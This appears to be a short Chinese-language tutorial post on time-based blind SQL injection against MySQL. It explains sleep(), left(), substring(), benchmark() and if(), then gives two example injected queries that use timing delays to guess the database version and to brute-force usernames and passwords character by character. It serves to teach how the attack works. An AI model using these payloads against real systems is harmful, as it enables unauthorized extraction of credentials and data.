1.时间窃取相关函数基本使用
相关函数:Sleep(),left,substring(),benchmark(),if()
Select sleep(1);睡眠1秒 Select left(user(),1)获得user()最左边的1位 Substring()获得字符串任意位置的任意个字符 Benchmark()对运算执行压力测试 If()表达式,第一个表达式为真,则执行第二个表达式,否则执行第三个表达式#### 2.时间窃取盲注应用 1.猜测版本号,穷举法猜测用户名、密码等 Select * from users where uname=‘$uname’ and if(left(version(),1)=5,sleep(1),2);
2.Benchmark穷举法猜测用户名和密码等 select * from users where uname=’admin’ and if(substring(uname,1,1)=’b’,benchmark(10000000,md5(‘b’)),1);
若有收获,就点个赞吧
0 人点赞
